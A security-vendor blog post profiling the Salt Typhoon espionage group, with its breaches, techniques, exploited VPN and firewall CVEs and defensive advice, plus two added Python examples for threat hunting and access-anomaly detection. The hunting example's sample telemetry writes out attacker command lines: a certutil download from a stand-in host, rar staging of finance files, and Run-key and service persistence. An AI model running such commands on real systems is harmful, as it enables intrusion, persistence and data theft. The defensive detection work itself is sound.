Salt Typhoon: The Threat Group Behind Major Cyberattacks

Varonis Threat Labs profiles Salt Typhoon, an APT group that is responsible for a series of breaches targeting U.S. infrastructure and government agencies.
Joseph Avanzato
5 min read
Last updated March 5, 2025

Salt Typhoon is an Advanced Persistent Threat (APT) group that is responsible for a series of breaches targeting United States infrastructure and government agencies. 

Salt Typhoon is known by many names depending on which security vendor is being referenced — Ghost Emperor by Kaspersky, FamousSparrow by ESET, Earth Estries by Trend Micro, and UNC2286 by Mandiant, to name a few. 

There is significant evidence that the group, allegedly backed by China’s Ministry of State Security (MSS), is composed of multiple distinct operating teams, each responsible for different victim sectors and operational responsibilities. This indicates a high degree of organization and maturity. 

It’s important that organizations understand how the threat group operates and its recent impacts for several reasons, including:

  • Advanced Persistent Threat (APT) backed by China's Ministry of State Security (MSS) 
  • Victim emphasis on corporate data theft and government counterintelligence 
  • Focus on espionage, stealing sensitive data rather than causing disruption 
  • Attempts to maintain a stealthy, long-term presence in compromised networks 
  • Relies on both Living Off the Land Binaries (LOLBins) and custom tools 

Continue reading to learn more about the group’s recent activity, successful attacks, and strategies to defend company data.

The history and recent activity of Salt Typhoon 

The group has likely existed for some time as an offshoot of PRC state-sponsored offensive cyber operations such as Volt Typhoon, demonstrating similar Tactics, Techniques, and Procedures (TTPs).

The offshoot group is believed to have been operating in some capacity since August 2019, attempting to compromise high-value individual targets such as President Donald Trump.

Since then, multiple breach events have been attributed to Salt Typhoon, the latest being the compromise of multiple U.S. telecom networks. Prior to this attack, CISA made it clear that its threat hunters had spotted the group with a presence in multiple Federal government networks.

This identification allowed for the takeover of a Virtual Private Server (VPS) used by the group and enabled a more rapid association with additional private-sector victims, including the aforementioned telecom providers.

The group is believed to have been surreptitiously collecting information, such as geolocation, from hundreds of devices in the Washington D.C. area over the past year while the compromise was still active.

Additionally, this level of breach provided Salt Typhoon with unprecedented access to sensitive data through the telecommunication infrastructure of many major providers such as Verizon, AT&T and at least seven others.

In January 2025, the Department of Treasury Office of Foreign Assets Control (OFAC) sanctioned Sichuan Juxinhe Network Technology, a Shanghai-based cybersecurity organization alleged to be directly involved with Salt Typhoon and related breaches. These types of sanctions against Chinese companies are not new to the U.S. government – another China-linked actor, Integrity Technology Group, is alleged to have managed a botnet comprised of over 260,000 devices since 2021, with victims spanning across multiple continents. 

The importance of victimology 

Salt Typhoon has distinguished itself mainly in terms of victimology, involving the widespread targeting of US Government agencies, infrastructure, and political figureheads. Some examples of this include: 

The targeting of political candidates included specific attempts to maliciously access their mobile devices, likely to glean sensitive data contained on the phones, such as messages, emails, files, or other information. 

While little technical data is known regarding the functional internals of their attacks on telecommunication infrastructure, Salt Typhoon likely performed numerous objectives, including data exfiltration, surveillance of prioritized targets, and general network reconnaissance activities after gaining access to such networks. One activity that is known is their deployment of a custom backdoor utility known as 'JumbledPath', which was responsible for monitoring network traffic to capture sensitive data at critical network junctions. 

Salt Typhoon has been primarily observed in breaches associated with telecom, government, and hospitality providers. It is highly probable that other sectors containing information of interest to the MSS would also be attacked by the group.

They are also well-known for taking aim at political targets, including individual candidates and likely campaign offices. 

Common TTPs used by Salt Typhoon 

Analysis of the exact techniques employed by Salt Typhoon, both pre- and post-compromise, is sparse, likely because organizations that have dealt with their breaches keep adversary knowledge internal. This is common with APTs: withholding details ensures that the adversary does not have a strong accounting of ‘what is known’ by cyber defenders. 

The below TTPs have been commonly associated with this threat group and should be used for broad-scope hunting across networks where there is suspicion of a compromise. 

TTPs include (but are not limited to):

  • Abuse of LOLBins 
    • BITSAdmin 
    • CertUtil 
    • PowerShell 
  • Abuse of WMI for Command Execution 
  • Abuse of SMB for Lateral Movement 
  • Abuse of PsExec for Command Execution / Lateral Movement 
  • Other tools observed include Mimikatz, Cobalt Strike, Powercat, etc. 

Additionally, blue teams have observed the group exploiting the below vulnerabilities in public-facing appliances or applications: 

  • CVE-2023-46805/CVE-2024-21887 – Ivanti Connect Secure VPN 
  • CVE-2023-48788 – Fortinet FortiClient EMS 
  • CVE-2022-3236 – Sophos Firewall 
  • Multiple CVEs for Microsoft Exchange relating to the ProxyLogon attack 
  • Vulnerabilities in Apache Tomcat present in QConvergeConsole 

Once a foothold is gained on a network, researchers have observed the following types of information-gathering and reconnaissance techniques being leveraged by the group: 

  • Retrieving ‘Domain Admin’ group details 
  • Abuse of ‘copy.exe’ to retrieve remotely hosted payloads 
  • Abuse of .cab files to mask malicious payloads 
  • Execution of tools via batch scripts 
  • Abuse of rar.exe to compress sensitive data prior to exfiltration, especially into directories such as C:\Users\Public\Music 
  • Modification of registry run keys to achieve persistence 
  • Creation of Windows Services to achieve persistence 
  • DLL Sideloading attacks designed to escalate privileges by hijacking legitimate application flows 
  • Raw-reads of NTFS to bypass access controls that may lock or prevent users, even local admins, from viewing certain files. 
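The LOLBin, lateral-movement and post-compromise techniques in the two lists above all surface as process-creation telemetry, which is where broad-scope hunting for them usually starts. The following Python block is an added example, not code from the original post or from Varonis: a small set of hunting rules run over constructed Sysmon-style process-creation events. The field names, rule names, sample hosts, the 203.0.113.x documentation address and the sample command lines are all assumptions made for illustration, and the `expand.exe` rule for .cab unpacking is an assumed detection rather than something the post describes.

```python
"""Hunting rules for the LOLBin, lateral-movement and post-compromise TTPs
listed above, run over constructed Sysmon-style process-creation events.
Added example for illustration; rule names, field names and sample events
are assumptions, not detection content from the original post."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str           # full path of the created process
    command_line: str
    parent_image: str    # full path of the parent process


def _is_image(ev, name):
    """True when the created process binary is `name`, wherever it lives on disk."""
    return ev.image.lower().endswith("\\" + name)


def _cmd_has(ev, pattern):
    return re.search(pattern, ev.command_line, re.I) is not None


# (rule name, predicate). Each predicate maps to one TTP from the lists above.
RULES = [
    # LOLBin download / decode tradecraft
    ("certutil_download", lambda ev: _is_image(ev, "certutil.exe")
                                     and _cmd_has(ev, r"-urlcache|-decode")),
    ("bitsadmin_transfer", lambda ev: _is_image(ev, "bitsadmin.exe")
                                      and _cmd_has(ev, r"/transfer|/addfile")),
    # WMI used for command execution
    ("wmi_process_create", lambda ev: _is_image(ev, "wmic.exe")
                                      and _cmd_has(ev, r"process\s+call\s+create")),
    # PsExec drops PSEXESVC on the target host; its children are the remote commands
    ("psexec_remote_exec", lambda ev: ev.parent_image.lower().endswith("\\psexesvc.exe")),
    # rar.exe staging archives under C:\Users\Public (e.g. ...\Public\Music)
    ("rar_staging_public", lambda ev: _is_image(ev, "rar.exe")
                                      and _cmd_has(ev, r"c:\\users\\public\\")),
    # .cab wrapping a payload, unpacked with the built-in expand.exe (assumed rule)
    ("cab_expand", lambda ev: _is_image(ev, "expand.exe") and _cmd_has(ev, r"\.cab\b")),
    # Persistence: Run-key modification and service creation
    ("run_key_persistence", lambda ev: _is_image(ev, "reg.exe")
                                       and _cmd_has(ev, r"\badd\b")
                                       and _cmd_has(ev, r"currentversion\\run")),
    ("service_persistence", lambda ev: _is_image(ev, "sc.exe")
                                       and _cmd_has(ev, r"\bcreate\b")),
]


def hunt(events):
    """Return (rule_name, host, command_line) for every rule each event triggers."""
    hits = []
    for ev in events:
        for name, pred in RULES:
            if pred(ev):
                hits.append((name, ev.host, ev.command_line))
    return hits


# Constructed sample telemetry (203.0.113.0/24 is documentation address space).
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    ProcEvent("WS-07", "CORP\\jdoe", SYS32 + r"\certutil.exe",
              r"certutil.exe -urlcache -split -f http://203.0.113.5/u.cab C:\Users\Public\Music\u.cab",
              SYS32 + r"\cmd.exe"),
    ProcEvent("WS-07", "CORP\\jdoe", SYS32 + r"\certutil.exe",
              r"certutil.exe -verify C:\certs\corp-root.cer", SYS32 + r"\cmd.exe"),  # benign
    ProcEvent("WS-07", "CORP\\jdoe", r"C:\Program Files\WinRAR\rar.exe",
              r"rar.exe a -r C:\Users\Public\Music\fin.rar C:\Finance\*", SYS32 + r"\cmd.exe"),
    ProcEvent("WS-07", "CORP\\jdoe", SYS32 + r"\reg.exe",
              r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\Public\Music\u.exe",
              SYS32 + r"\cmd.exe"),
    ProcEvent("WS-07", "CORP\\jdoe", SYS32 + r"\reg.exe",
              r"reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Run", SYS32 + r"\cmd.exe"),  # benign
    ProcEvent("SRV-02", "NT AUTHORITY\\SYSTEM", SYS32 + r"\sc.exe",
              r"sc.exe create UpdSvc binPath= C:\Users\Public\Music\u.exe start= auto", SYS32 + r"\cmd.exe"),
    ProcEvent("SRV-02", "CORP\\jdoe", SYS32 + r"\cmd.exe",
              r"cmd.exe /c whoami", r"C:\Windows\PSEXESVC.exe"),
]

if __name__ == "__main__":
    for rule, host, cmd in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {cmd}")
```

The two benign events (a certificate verification and a read-only `reg query`) are there on purpose: rules keyed only on the binary name would fire on them, so each rule also requires the argument pattern that distinguishes abuse from routine administration. In production the same predicates would be fed from an EDR or SIEM query rather than an in-memory list.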

Recommendations to defend against threats like Salt Typhoon 

Keeping sensitive data secure from threats like Salt Typhoon is crucial, especially with the group’s emphasis on corporate data theft and government counterintelligence.

Our defensive recommendations include:

  • Ensure access to company sensitive data is tightly controlled and monitored, with user-behavior alerting configured to watch for anomalous access. 
  • Ensure that all public-facing applications are kept up to date with respect to both Operating System and running Applications. 
  • Ensure that all remote access mechanisms (VPN, VDI, M365, etc.) are configured with strong MFA mechanisms to prevent immediate user access in the event of a credential compromise. 
  • Ensure that network security controls are in place with deny-all rules for outbound communication as a default to prevent unwanted connections to external hosts. 
  • Ensure data is encrypted both at-rest and in-transit. 
  • Measure and manage your external attack surface periodically to identify any critical gaps or failings in existing controls. 
  • Deploy Endpoint Detection & Response software to all endpoints in the organization. 
  • Prepare Incident Response Plans (IRPs) for security events before they occur to both test and validate that expected defenses will be effective. 
  • Engage in table-top exercises to simulate anticipated threats with the goal of identifying weaknesses and strengths in IRPs. 
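The first recommendation above, user-behavior alerting on anomalous access to sensitive data, can be illustrated with a per-user baseline over file-share audit records. The following Python block is an added example that is not part of the original post and is not Varonis' product logic: the audit-record layout, the users, the share names, and the thresholds (a z-score of 3 with a 1 MB floor on the standard deviation) are all constructed assumptions.

```python
"""Per-user baseline of file-share access volume and share set, illustrating
user-behavior alerting on anomalous data access. Added example with
constructed audit records; not Varonis' UEBA logic."""
from collections import defaultdict
from statistics import mean, pstdev

MB = 1_000_000

# Constructed audit records: (day, user, share, bytes_read). Five quiet
# baseline days per user, then one day to evaluate.
BASELINE = (
    [(d, "alice", r"\\fs01\finance", v * MB) for d, v in zip(range(1, 6), (40, 42, 38, 41, 39))]
    + [(d, "bob", r"\\fs01\hr", 10 * MB) for d in range(1, 6)]
)
TODAY = [
    (6, "alice", r"\\fs01\finance", 900 * MB),   # bulk read far above her norm
    (6, "alice", r"\\fs01\legal", 120 * MB),     # a share she has never touched
    (6, "bob", r"\\fs01\hr", 11 * MB),           # within bob's normal range
    (6, "carol", r"\\fs01\finance", 5 * MB),     # account with no history at all
]


def build_baseline(records):
    """Return {user: {"mean": bytes/day, "std": bytes/day, "shares": set}}."""
    daily = defaultdict(lambda: defaultdict(int))   # user -> day -> bytes
    shares = defaultdict(set)
    for day, user, share, nbytes in records:
        daily[user][day] += nbytes
        shares[user].add(share.lower())
    profile = {}
    for user, days in daily.items():
        values = list(days.values())
        profile[user] = {"mean": mean(values), "std": pstdev(values), "shares": shares[user]}
    return profile


def detect(profile, records, z=3.0, std_floor=1 * MB):
    """Alert when a user's daily volume exceeds mean + z*std (std is floored so a
    perfectly regular history does not alert on noise), when they touch a share
    absent from their baseline, or when they have no baseline at all."""
    volume = defaultdict(int)
    seen = defaultdict(set)
    for day, user, share, nbytes in records:
        volume[user] += nbytes
        seen[user].add(share.lower())
    alerts = []
    for user in sorted(volume):
        p = profile.get(user)
        if p is None:
            alerts.append((user, "no_baseline"))
            continue
        if volume[user] > p["mean"] + z * max(p["std"], std_floor):
            alerts.append((user, "volume_spike"))
        new_shares = seen[user] - p["shares"]
        if new_shares:
            alerts.append((user, "new_shares:" + ",".join(sorted(new_shares))))
    return alerts


if __name__ == "__main__":
    for user, reason in detect(build_baseline(BASELINE), TODAY):
        print(f"ALERT {user}: {reason}")
```

The floor on the standard deviation matters in practice: an account whose history is perfectly regular has a standard deviation of zero, and without the floor any one-byte increase would alert. The separate "new share" signal catches the lateral data discovery that precedes bulk staging even when the byte count is still modest.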

How Varonis can help 

Threat actors such as Salt Typhoon target critical data in their victims' networks. Being able to detect and audit historical data access is paramount to identifying these types of threats.

If your organization does not have visibility into data, identifying anomalous access or exfiltration will be nearly impossible — this is where Varonis plays a key role in your security stack. 

Exfiltrating critical data is by far the most common tactic utilized by groups such as Salt Typhoon. Lacking this audit capability leaves organizations in a precarious position when it comes to detecting both basic and advanced threats to data. 

Using User and Entity Behavior Analytics (UEBA) across multiple data streams, such as File Shares, Active Directory, DNS, Proxy, and more, makes Varonis well-positioned to identify and alert on anomalous access and data theft, helping to more thoroughly protect your organization’s crown jewels. 

Learn more with State of Cybercrime 

Varonis' Matt Radolec and David Gibson cover Salt Typhoon's activity in State of Cybercrime, a video series covering the latest in cybercrime news. Enjoy the episodes below to learn more about Salt Typhoon and join us for a live show.

Matt and David cover the rise of Salt Typhoon and other cybercrime news.

Matt and David give an update on Salt Typhoon's recent activity.
